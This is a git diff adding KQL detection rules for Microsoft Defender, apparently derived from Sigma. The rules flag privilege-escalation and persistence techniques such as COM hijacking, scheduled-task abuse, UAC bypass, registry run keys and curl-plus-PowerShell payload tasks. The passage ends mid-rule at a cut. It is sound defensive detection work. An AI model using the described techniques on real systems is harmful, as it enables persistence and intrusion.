b/KQL/rules/Privilege Escalation/potential_psfactorybuffer_com_hijacking.kql @@ -0,0 +1,10 @@ +// Title: Potential PSFactoryBuffer COM Hijacking +// Author: BlackBerry Threat Research and Intelligence Team - @Joseliyo_Jstnk +// Date: 2023-06-07 +// Level: high +// Description: Detects changes to the PSFactory COM InProcServer32 registry. This technique was used by RomCom to create persistence storing a malicious DLL. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.015 + +DeviceRegistryEvents +| where RegistryKey endswith "\\CLSID\\{c90250f3-4d7d-4991-9b69-a5c5bc1c2ae6}\\InProcServer32\\(Default)" and (not((RegistryValueData in~ ("%windir%\\System32\\ActXPrxy.dll", "C:\\Windows\\System32\\ActXPrxy.dll")))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/potential_registry_persistence_attempt_via_dbgmanageddebugger.kql b/KQL/rules/Privilege Escalation/potential_registry_persistence_attempt_via_dbgmanageddebugger.kql new file mode 100644 index 00000000..c882c39b --- /dev/null +++ b/KQL/rules/Privilege Escalation/potential_registry_persistence_attempt_via_dbgmanageddebugger.kql @@ -0,0 +1,12 @@ +// Title: Potential Registry Persistence Attempt Via DbgManagedDebugger +// Author: frack113 +// Date: 2022-08-07 +// Level: medium +// Description: Detects the addition of the "Debugger" value to the "DbgManagedDebugger" key in order to achieve persistence. Which will get invoked when an application crashes +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.defense-evasion, attack.persistence, attack.t1574 +// False Positives: +// - Legitimate use of the key to setup a debugger. Which is often the case on developers machines + +DeviceRegistryEvents +| where RegistryKey endswith "\\Microsoft\\.NETFramework\\DbgManagedDebugger" and (not(RegistryValueData =~ "\"C:\\Windows\\system32\\vsjitdebugger.exe\" PID %d APPDOM %d EXTEXT \"%s\" EVTHDL %d")) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/potential_registry_persistence_attempt_via_windows_telemetry.kql b/KQL/rules/Privilege Escalation/potential_registry_persistence_attempt_via_windows_telemetry.kql new file mode 100644 index 00000000..d80bf4f8 --- /dev/null +++ b/KQL/rules/Privilege Escalation/potential_registry_persistence_attempt_via_windows_telemetry.kql @@ -0,0 +1,14 @@ +// Title: Potential Registry Persistence Attempt Via Windows Telemetry +// Author: Lednyov Alexey, oscd.community, Sreeman +// Date: 2020-10-16 +// Level: high +// Description: Detects potential persistence behavior using the windows telemetry registry key. +Windows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections. +This binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run. +The problem is, it will run any arbitrary command without restriction of location or type. + +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005 + +DeviceRegistryEvents +| where ((RegistryValueData contains ".bat" or RegistryValueData contains ".bin" or RegistryValueData contains ".cmd" or RegistryValueData contains ".dat" or RegistryValueData contains ".dll" or RegistryValueData contains ".exe" or RegistryValueData contains ".hta" or RegistryValueData contains ".jar" or RegistryValueData contains ".js" or RegistryValueData contains ".msi" or RegistryValueData contains ".ps" or RegistryValueData contains ".sh" or RegistryValueData contains ".vb") and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\TelemetryController*" and RegistryKey endswith "\\Command") and (not((RegistryValueData contains "\\system32\\CompatTelRunner.exe" or RegistryValueData contains "\\system32\\DeviceCensus.exe"))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/potential_ripzip_attack_on_startup_folder.kql b/KQL/rules/Privilege Escalation/potential_ripzip_attack_on_startup_folder.kql new file mode 100644 index 00000000..a84df41f --- /dev/null +++ b/KQL/rules/Privilege Escalation/potential_ripzip_attack_on_startup_folder.kql @@ -0,0 +1,13 @@ +// Title: Potential RipZip Attack on Startup Folder +// Author: Greg (rule) +// Date: 2022-07-21 +// Level: high +// Description: Detects a phishing attack which expands a ZIP file containing a malicious shortcut. +If the victim expands the ZIP file via the explorer process, then the explorer process expands the malicious ZIP file and drops a malicious shortcut redirected to a backdoor into the Startup folder. +Additionally, the file name of the malicious shortcut in Startup folder contains {0AFACED1-E828-11D1-9187-B532F1E9575D} meaning the folder shortcut operation. + +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547 + +DeviceFileEvents +| where InitiatingProcessFolderPath endswith "\\explorer.exe" and (FolderPath contains "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup" and FolderPath contains ".lnk.{0AFACED1-E828-11D1-9187-B532F1E9575D}") \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/potential_ssh_tunnel_persistence_install_using_a_scheduled_task.kql b/KQL/rules/Privilege Escalation/potential_ssh_tunnel_persistence_install_using_a_scheduled_task.kql new file mode 100644 index 00000000..b9de7124 --- /dev/null +++ b/KQL/rules/Privilege Escalation/potential_ssh_tunnel_persistence_install_using_a_scheduled_task.kql @@ -0,0 +1,10 @@ +// Title: Potential SSH Tunnel Persistence Install Using A Scheduled Task +// Author: Rory Duncan +// Date: 2025-07-14 +// Level: high +// Description: Detects the creation of new scheduled tasks via commandline, using Schtasks.exe. This rule detects tasks creating that call OpenSSH, which may indicate the creation of reverse SSH tunnel to the attacker's server. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.execution, attack.t1053.005, attack.command-and-control + +DeviceProcessEvents +| where (FolderPath endswith "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe") and ((ProcessCommandLine contains " /create " and ProcessCommandLine contains "ssh.exe" and ProcessCommandLine contains "-i") or (ProcessCommandLine contains " /create " and ProcessCommandLine contains "sshd.exe" and ProcessCommandLine contains "-f")) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/potential_startup_shortcut_persistence_via_powershell_exe.kql b/KQL/rules/Privilege Escalation/potential_startup_shortcut_persistence_via_powershell_exe.kql new file mode 100644 index 00000000..e0b0fdfa --- /dev/null +++ b/KQL/rules/Privilege Escalation/potential_startup_shortcut_persistence_via_powershell_exe.kql @@ -0,0 +1,16 @@ +// Title: Potential Startup Shortcut Persistence Via PowerShell.EXE +// Author: Christopher Peacock '@securepeacock', SCYTHE +// Date: 2021-10-24 +// Level: high +// Description: Detects PowerShell writing startup shortcuts. +This procedure was highlighted in Red Canary Intel Insights Oct. 2021, "We frequently observe adversaries using PowerShell to write malicious .lnk files into the startup directory to establish persistence. +Accordingly, this detection opportunity is likely to identify persistence mechanisms in multiple threats. +In the context of Yellow Cockatoo, this persistence mechanism eventually launches the command-line script that leads to the installation of a malicious DLL" + +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001 +// False Positives: +// - Depending on your environment accepted applications may leverage this at times. It is recommended to search for anomalies inidicative of malware. + +DeviceFileEvents +| where (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe") and FolderPath contains "\\start menu\\programs\\startup\\" and FolderPath endswith ".lnk" \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/potential_uac_bypass_via_sdclt_exe.kql b/KQL/rules/Privilege Escalation/potential_uac_bypass_via_sdclt_exe.kql new file mode 100644 index 00000000..291e35e0 --- /dev/null +++ b/KQL/rules/Privilege Escalation/potential_uac_bypass_via_sdclt_exe.kql @@ -0,0 +1,10 @@ +// Title: Potential UAC Bypass Via Sdclt.EXE +// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) +// Date: 2020-05-02 +// Level: medium +// Description: A General detection for sdclt being spawned as an elevated process. This could be an indicator of sdclt being used for bypass UAC techniques. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1548.002 + +DeviceProcessEvents +| where FolderPath endswith "sdclt.exe" and (ProcessIntegrityLevel in~ ("High", "S-1-16-12288")) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/powershell_web_access_feature_enabled_via_dism.kql b/KQL/rules/Privilege Escalation/powershell_web_access_feature_enabled_via_dism.kql new file mode 100644 index 00000000..0cee95d1 --- /dev/null +++ b/KQL/rules/Privilege Escalation/powershell_web_access_feature_enabled_via_dism.kql @@ -0,0 +1,12 @@ +// Title: PowerShell Web Access Feature Enabled Via DISM +// Author: Michael Haag +// Date: 2024-09-03 +// Level: high +// Description: Detects the use of DISM to enable the PowerShell Web Access feature, which could be used for remote access and potential abuse +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.defense-evasion, attack.persistence, attack.t1548.002 +// False Positives: +// - Legitimate PowerShell Web Access installations by administrators + +DeviceProcessEvents +| where (ProcessCommandLine contains "WindowsPowerShellWebAccess" and ProcessCommandLine contains "/online" and ProcessCommandLine contains "/enable-feature") and (FolderPath endswith "\\dism.exe" or ProcessVersionInfoOriginalFileName =~ "DISM.EXE") \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/registry_persistence_via_explorer_run_key.kql b/KQL/rules/Privilege Escalation/registry_persistence_via_explorer_run_key.kql new file mode 100644 index 00000000..bb1151e7 --- /dev/null +++ b/KQL/rules/Privilege Escalation/registry_persistence_via_explorer_run_key.kql @@ -0,0 +1,10 @@ +// Title: Registry Persistence via Explorer Run Key +// Author: Florian Roth (Nextron Systems), oscd.community +// Date: 2018-07-18 +// Level: high +// Description: Detects a possible persistence mechanism using RUN key for Windows Explorer and pointing to a suspicious folder +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001 + +DeviceRegistryEvents +| where (RegistryValueData contains ":\\$Recycle.bin\\" or RegistryValueData contains ":\\ProgramData\\" or RegistryValueData contains ":\\Temp\\" or RegistryValueData contains ":\\Users\\Default\\" or RegistryValueData contains ":\\Users\\Public\\" or RegistryValueData contains ":\\Windows\\Temp\\" or RegistryValueData contains "\\AppData\\Local\\Temp\\") and RegistryKey endswith "\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run" \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/regsvr32_dll_execution_with_uncommon_extension.kql b/KQL/rules/Privilege Escalation/regsvr32_dll_execution_with_uncommon_extension.kql new file mode 100644 index 00000000..287d95b5 --- /dev/null +++ b/KQL/rules/Privilege Escalation/regsvr32_dll_execution_with_uncommon_extension.kql @@ -0,0 +1,12 @@ +// Title: Regsvr32 DLL Execution With Uncommon Extension +// Author: Florian Roth (Nextron Systems) +// Date: 2019-07-17 +// Level: medium +// Description: Detects a "regsvr32" execution where the DLL doesn't contain a common file extension. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574, attack.execution +// False Positives: +// - Other legitimate extensions currently not in the list either from third party or specific Windows components. + +DeviceProcessEvents +| where (FolderPath endswith "\\regsvr32.exe" or ProcessVersionInfoOriginalFileName =~ "REGSVR32.EXE") and (not((ProcessCommandLine =~ "" or (ProcessCommandLine contains ".ax" or ProcessCommandLine contains ".cpl" or ProcessCommandLine contains ".dll" or ProcessCommandLine contains ".ocx") or isnull(ProcessCommandLine)))) and (not((ProcessCommandLine contains ".bav" or ProcessCommandLine contains ".ppl"))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/renamed_vmnat_exe_execution.kql b/KQL/rules/Privilege Escalation/renamed_vmnat_exe_execution.kql new file mode 100644 index 00000000..483594bf --- /dev/null +++ b/KQL/rules/Privilege Escalation/renamed_vmnat_exe_execution.kql @@ -0,0 +1,10 @@ +// Title: Renamed Vmnat.exe Execution +// Author: elhoim +// Date: 2022-09-09 +// Level: high +// Description: Detects renamed vmnat.exe or portable version that can be used for DLL side-loading +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001 + +DeviceProcessEvents +| where ProcessVersionInfoOriginalFileName =~ "vmnat.exe" and (not(FolderPath endswith "vmnat.exe")) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/root_account_enable_via_dsenableroot.kql b/KQL/rules/Privilege Escalation/root_account_enable_via_dsenableroot.kql new file mode 100644 index 00000000..dd73044f --- /dev/null +++ b/KQL/rules/Privilege Escalation/root_account_enable_via_dsenableroot.kql @@ -0,0 +1,10 @@ +// Title: Root Account Enable Via Dsenableroot +// Author: Sohan G (D4rkCiph3r) +// Date: 2023-08-22 +// Level: medium +// Description: Detects attempts to enable the root account via "dsenableroot" +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1078, attack.t1078.001, attack.t1078.003, attack.initial-access, attack.persistence + +DeviceProcessEvents +| where FolderPath endswith "/dsenableroot" and (not(ProcessCommandLine contains " -d ")) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/rundll32_registered_com_objects.kql b/KQL/rules/Privilege Escalation/rundll32_registered_com_objects.kql new file mode 100644 index 00000000..f6972c12 --- /dev/null +++ b/KQL/rules/Privilege Escalation/rundll32_registered_com_objects.kql @@ -0,0 +1,12 @@ +// Title: Rundll32 Registered COM Objects +// Author: frack113 +// Date: 2022-02-13 +// Level: high +// Description: load malicious registered COM objects +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.015 +// False Positives: +// - Legitimate use + +DeviceProcessEvents +| where ((ProcessCommandLine contains "-sta " or ProcessCommandLine contains "-localserver ") and (ProcessCommandLine contains "{" and ProcessCommandLine contains "}")) and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE") \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/schedule_task_creation_from_env_variable_or_potentially_suspicious_path_via_schtasks_exe.kql b/KQL/rules/Privilege Escalation/schedule_task_creation_from_env_variable_or_potentially_suspicious_path_via_schtasks_exe.kql new file mode 100644 index 00000000..18ddba49 --- /dev/null +++ b/KQL/rules/Privilege Escalation/schedule_task_creation_from_env_variable_or_potentially_suspicious_path_via_schtasks_exe.kql @@ -0,0 +1,13 @@ +// Title: Schedule Task Creation From Env Variable Or Potentially Suspicious Path Via Schtasks.EXE +// Author: Florian Roth (Nextron Systems) +// Date: 2022-02-21 +// Level: medium +// Description: Detects Schtask creations that point to a suspicious folder or an environment variable often used by malware +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.execution, attack.t1053.005 +// False Positives: +// - Benign scheduled tasks creations or executions that happen often during software installations +// - Software that uses the AppData folder and scheduled tasks to update the software in the AppData folders + +DeviceProcessEvents +| where (((ProcessCommandLine contains ":\\Perflogs" or ProcessCommandLine contains ":\\Users\\All Users\\" or ProcessCommandLine contains ":\\Users\\Default\\" or ProcessCommandLine contains ":\\Users\\Public" or ProcessCommandLine contains ":\\Windows\\Temp" or ProcessCommandLine contains "\\AppData\\Local\\" or ProcessCommandLine contains "\\AppData\\Roaming\\" or ProcessCommandLine contains "%AppData%" or ProcessCommandLine contains "%Public%") and ((ProcessCommandLine contains " -create " or ProcessCommandLine contains " /create " or ProcessCommandLine contains " –create " or ProcessCommandLine contains " —create " or ProcessCommandLine contains " ―create ") and FolderPath endswith "\\schtasks.exe")) or (InitiatingProcessCommandLine endswith "\\svchost.exe -k netsvcs -p -s Schedule" and (ProcessCommandLine contains ":\\Perflogs" or ProcessCommandLine contains ":\\Windows\\Temp" or ProcessCommandLine contains "\\Users\\Public" or ProcessCommandLine contains "%Public%"))) and (not(((ProcessCommandLine contains "/Create /Xml " and ProcessCommandLine contains "\\Temp\\.CR." and ProcessCommandLine contains "\\Avira_Security_Installation.xml") or ((ProcessCommandLine contains ".tmp\\UpdateFallbackTask.xml" or ProcessCommandLine contains ".tmp\\WatchdogServiceControlManagerTimeout.xml" or ProcessCommandLine contains ".tmp\\SystrayAutostart.xml" or ProcessCommandLine contains ".tmp\\MaintenanceTask.xml") and (ProcessCommandLine contains "/Create /F /TN" and ProcessCommandLine contains "/Xml " and ProcessCommandLine contains "\\Temp\\" and ProcessCommandLine contains "Avira_")) or (ProcessCommandLine contains "\\Temp\\" and ProcessCommandLine contains "/Create /TN \"klcp_update\" /XML " and ProcessCommandLine contains "\\klcp_update_task.xml") or (InitiatingProcessCommandLine contains "unattended.ini" or ProcessCommandLine contains "update_task.xml") or ProcessCommandLine contains "/Create /TN TVInstallRestore /TR"))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/scheduled_task_creation_masquerading_as_system_processes.kql b/KQL/rules/Privilege Escalation/scheduled_task_creation_masquerading_as_system_processes.kql new file mode 100644 index 00000000..74981cca --- /dev/null +++ b/KQL/rules/Privilege Escalation/scheduled_task_creation_masquerading_as_system_processes.kql @@ -0,0 +1,12 @@ +// Title: Scheduled Task Creation Masquerading as System Processes +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-02-05 +// Level: high +// Description: Detects the creation of scheduled tasks that involve system processes, which may indicate malicious actors masquerading as or abusing these processes to execute payloads or maintain persistence. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005, attack.defense-evasion, attack.t1036.004, attack.t1036.005 +// False Positives: +// - Legitimate system administration tasks scheduling trusted system processes. + +DeviceProcessEvents +| where ((ProcessCommandLine contains " audiodg" or ProcessCommandLine contains " conhost" or ProcessCommandLine contains " dwm.exe" or ProcessCommandLine contains " explorer" or ProcessCommandLine contains " lsass" or ProcessCommandLine contains " lsm" or ProcessCommandLine contains " mmc" or ProcessCommandLine contains " msiexec" or ProcessCommandLine contains " regsvr32" or ProcessCommandLine contains " rundll32" or ProcessCommandLine contains " services" or ProcessCommandLine contains " spoolsv" or ProcessCommandLine contains " svchost" or ProcessCommandLine contains " taskeng" or ProcessCommandLine contains " taskhost" or ProcessCommandLine contains " wininit" or ProcessCommandLine contains " winlogon") and (ProcessCommandLine contains " -create " or ProcessCommandLine contains " /create " or ProcessCommandLine contains " –create " or ProcessCommandLine contains " —create " or ProcessCommandLine contains " ―create ")) and (FolderPath endswith "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe") \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/scheduled_task_creation_with_curl_and_powershell_execution_combo.kql b/KQL/rules/Privilege Escalation/scheduled_task_creation_with_curl_and_powershell_execution_combo.kql new file mode 100644 index 00000000..8c557d30 --- /dev/null +++ b/KQL/rules/Privilege Escalation/scheduled_task_creation_with_curl_and_powershell_execution_combo.kql @@ -0,0 +1,15 @@ +// Title: Scheduled Task Creation with Curl and PowerShell Execution Combo +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-02-05 +// Level: medium +// Description: Detects the creation of a scheduled task using schtasks.exe, potentially in combination with curl for downloading payloads and PowerShell for executing them. +This facilitates executing malicious payloads or connecting with C&C server persistently without dropping the malware sample on the host. + +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005, attack.defense-evasion, attack.t1218, attack.command-and-control, attack.t1105 +// False Positives: +// - Legitimate use of schtasks for administrative purposes. +// - Automation scripts combining curl and PowerShell in controlled environments. + +DeviceProcessEvents +| where (ProcessCommandLine contains "curl " and ProcessCommandLine contains "http" and ProcessCommandLine contains "-o") and ((ProcessCommandLine contains " -create " or ProcessCommandLine contains " /create " or ProcessCommandLine contains " –create " or ProcessCommandLine contains " —create " or ProcessCommandLine contains " ―create ") and FolderPath endswith "\\schtasks.exe") and ProcessCommandLine contains "powershell" \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/scheduled_task_executing_encoded_payload_from_registry.kql b/KQL/rules/Privilege Escalation/scheduled_task_executing_encoded_payload_from_registry.kql new file mode 100644 index 00000000..48a2d5d9 --- /dev/null +++ b/KQL/rules/Privilege Escalation/scheduled_task_executing_encoded_payload_from_registry.kql @@ -0,0 +1,12 @@ +// Title: Scheduled Task Executing Encoded Payload from Registry +// Author: pH-T (Nextron Systems), @Kostastsale, TheDFIRReport, X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-02-12 +// Level: high +// Description: Detects the creation of a schtask that potentially executes a base64 encoded payload stored in the Windows Registry using PowerShell. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005, attack.t1059.001 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where ProcessCommandLine contains "/Create" and (ProcessCommandLine contains "FromBase64String" or ProcessCommandLine contains "encodedcommand") and (ProcessCommandLine contains "Get-ItemProperty" or ProcessCommandLine contains " gp ") and (ProcessCommandLine contains "HKCU:" or ProcessCommandLine contains "HKLM:" or ProcessCommandLine contains "registry::" or ProcessCommandLine contains "HKEY_") and (FolderPath endswith "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe") \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/scheduled_task_executing_payload_from_registry.kql b/KQL/rules/Privilege Escalation/scheduled_task_executing_payload_from_registry.kql new file mode 100644 index 00000000..9da4b61e --- /dev/null +++ b/KQL/rules/Privilege Escalation/scheduled_task_executing_payload_from_registry.kql @@ -0,0 +1,10 @@ +// Title: Scheduled Task Executing Payload from Registry +// Author: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-07-18 +// Level: medium +// Description: Detects the creation of a schtasks that potentially executes a payload stored in the Windows Registry using PowerShell. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005, attack.t1059.001 + +DeviceProcessEvents +| where (ProcessCommandLine contains "/Create" and (ProcessCommandLine contains "Get-ItemProperty" or ProcessCommandLine contains " gp ") and (ProcessCommandLine contains "HKCU:" or ProcessCommandLine contains "HKLM:" or ProcessCommandLine contains "registry::" or ProcessCommandLine contains "HKEY_") and (FolderPath endswith "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe")) and (not((ProcessCommandLine contains "FromBase64String" or ProcessCommandLine contains "encodedcommand"))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/scheduled_task_job_at.kql b/KQL/rules/Privilege Escalation/scheduled_task_job_at.kql new file mode 100644 index 00000000..15181baa --- /dev/null +++ b/KQL/rules/Privilege Escalation/scheduled_task_job_at.kql @@ -0,0 +1,14 @@ +// Title: Scheduled Task/Job At +// Author: Ömer Günal, oscd.community +// Date: 2020-10-06 +// Level: low +// Description: Detects the use of at/atd which are utilities that are used to schedule tasks. +They are often abused by adversaries to maintain persistence or to perform task scheduling for initial or recurring execution of malicious code + +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.002 +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents +| where FolderPath endswith "/at" or FolderPath endswith "/atd" \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/scheduled_taskcache_change_by_uncommon_program.kql b/KQL/rules/Privilege Escalation/scheduled_taskcache_change_by_uncommon_program.kql new file mode 100644 index 00000000..9b54a51a --- /dev/null +++ b/KQL/rules/Privilege Escalation/scheduled_taskcache_change_by_uncommon_program.kql @@ -0,0 +1,10 @@ +// Title: Scheduled TaskCache Change by Uncommon Program +// Author: Syed Hasan (@syedhasan009) +// Date: 2021-06-18 +// Level: high +// Description: Monitor the creation of a new key under 'TaskCache' when a new scheduled task is registered by a process that is not svchost.exe, which is suspicious +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053, attack.t1053.005 + +DeviceRegistryEvents +| where RegistryKey endswith "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache*" and (not((RegistryValueData =~ "(Empty)" or (InitiatingProcessFolderPath =~ "C:\\Windows\\explorer.exe" and RegistryKey endswith "\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\Microsoft\\Windows\\PLA\\Server Manager Performance Monitor*") or InitiatingProcessFolderPath endswith "C:\\Windows\\System32\\MoUsoCoreWorker.exe" or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\msiexec.exe" or (InitiatingProcessFolderPath endswith "\\ngen.exe" and InitiatingProcessFolderPath startswith "C:\\Windows\\Microsoft.NET\\Framework" and (RegistryKey contains "\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\{B66B135D-DA06-4FC4-95F8-7458E1D10129}" or RegistryKey contains "\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\Microsoft\\Windows\\.NET Framework\\.NET Framework NGEN")) or isnull(RegistryValueData) or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\Microsoft Office\\root\\Integration\\Integrator.exe", "C:\\Program Files (x86)\\Microsoft Office\\root\\Integration\\Integrator.exe", "C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RClient.exe", "C:\\Program Files (x86)\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RClient.exe")) or (RegistryKey contains "Microsoft\\Windows\\UpdateOrchestrator" or RegistryKey contains "Microsoft\\Windows\\SoftwareProtectionPlatform\\SvcRestartTask\\Index" or RegistryKey contains "Microsoft\\Windows\\Flighting\\OneSettings\\RefreshCache\\Index") or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\RuntimeBroker.exe" or InitiatingProcessFolderPath endswith "C:\\Windows\\System32\\services.exe" or InitiatingProcessFolderPath =~ "C:\\WINDOWS\\system32\\svchost.exe" or InitiatingProcessFolderPath =~ "System" or (InitiatingProcessFolderPath endswith "\\TiWorker.exe" and InitiatingProcessFolderPath startswith "C:\\Windows\\")))) and (not(((InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Dropbox\\Update\\DropboxUpdate.exe", "C:\\Program Files\\Dropbox\\Update\\DropboxUpdate.exe")) or (InitiatingProcessFolderPath endswith "C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\MicrosoftEdgeUpdate.exe" or InitiatingProcessFolderPath endswith "C:\\Program Files\\Microsoft\\EdgeUpdate\\MicrosoftEdgeUpdate.exe") or (InitiatingProcessFolderPath endswith "C:\\Program Files (x86)\\Microsoft OneDrive\\OneDrive.exe" or InitiatingProcessFolderPath endswith "C:\\Program Files\\Microsoft OneDrive\\OneDrive.exe")))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/schtasks_creation_or_modification_with_system_privileges.kql b/KQL/rules/Privilege Escalation/schtasks_creation_or_modification_with_system_privileges.kql new file mode 100644 index 00000000..ae15f223 --- /dev/null +++ b/KQL/rules/Privilege Escalation/schtasks_creation_or_modification_with_system_privileges.kql @@ -0,0 +1,10 @@ +// Title: Schtasks Creation Or Modification With SYSTEM Privileges +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-07-28 +// Level: high +// Description: Detects the creation or update of a scheduled task to run with "NT AUTHORITY\SYSTEM" privileges +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005 + +DeviceProcessEvents +| where (((ProcessCommandLine contains " /change " or ProcessCommandLine contains " /create ") and FolderPath endswith "\\schtasks.exe") and ProcessCommandLine contains "/ru " and (ProcessCommandLine contains "NT AUT" or ProcessCommandLine contains " SYSTEM ")) and (not(((ProcessCommandLine contains "/Create /F /RU System /SC WEEKLY /TN AviraSystemSpeedupVerify /TR " or ProcessCommandLine contains ":\\Program Files (x86)\\Avira\\System Speedup\\setup\\avira_speedup_setup.exe" or ProcessCommandLine contains "/VERIFY /VERYSILENT /NOSTART /NODOTNET /NORESTART\" /RL HIGHEST") or (ProcessCommandLine contains "Subscription Heartbeat" and ProcessCommandLine contains "\\HeartbeatConfig.xml" and ProcessCommandLine contains "\\Microsoft Shared\\OFFICE") or ((ProcessCommandLine contains "/TN TVInstallRestore" and ProcessCommandLine contains "\\TeamViewer_.exe") and FolderPath endswith "\\schtasks.exe")))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/schtasks_from_suspicious_folders.kql b/KQL/rules/Privilege Escalation/schtasks_from_suspicious_folders.kql new file mode 100644 index 00000000..3acf421e --- /dev/null +++ b/KQL/rules/Privilege Escalation/schtasks_from_suspicious_folders.kql @@ -0,0 +1,10 @@ +// Title: Schtasks From Suspicious Folders +// Author: Florian Roth (Nextron Systems) +// Date: 2022-04-15 +// Level: high +// Description: Detects scheduled task creations that have suspicious action command and folder combinations +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.execution, attack.t1053.005 + +DeviceProcessEvents +| where (ProcessCommandLine contains "C:\\ProgramData\\" or ProcessCommandLine contains "%ProgramData%") and (ProcessCommandLine contains "powershell" or ProcessCommandLine contains "pwsh" or ProcessCommandLine contains "cmd /c " or ProcessCommandLine contains "cmd /k " or ProcessCommandLine contains "cmd /r " or ProcessCommandLine contains "cmd.exe /c " or ProcessCommandLine contains "cmd.exe /k " or ProcessCommandLine contains "cmd.exe /r ") and ProcessCommandLine contains " /create " and (FolderPath endswith "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe") \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/security_privileges_enumeration_via_whoami_exe.kql b/KQL/rules/Privilege Escalation/security_privileges_enumeration_via_whoami_exe.kql new file mode 100644 index 00000000..807837c3 --- /dev/null +++ b/KQL/rules/Privilege Escalation/security_privileges_enumeration_via_whoami_exe.kql @@ -0,0 +1,10 @@ +// Title: Security Privileges Enumeration Via Whoami.EXE +// Author: Florian Roth (Nextron Systems) +// Date: 2021-05-05 +// Level: high +// Description: Detects a whoami.exe executed with the /priv command line flag instructing the tool to show all current user privileges. This is often used after a privilege escalation attempt. +// 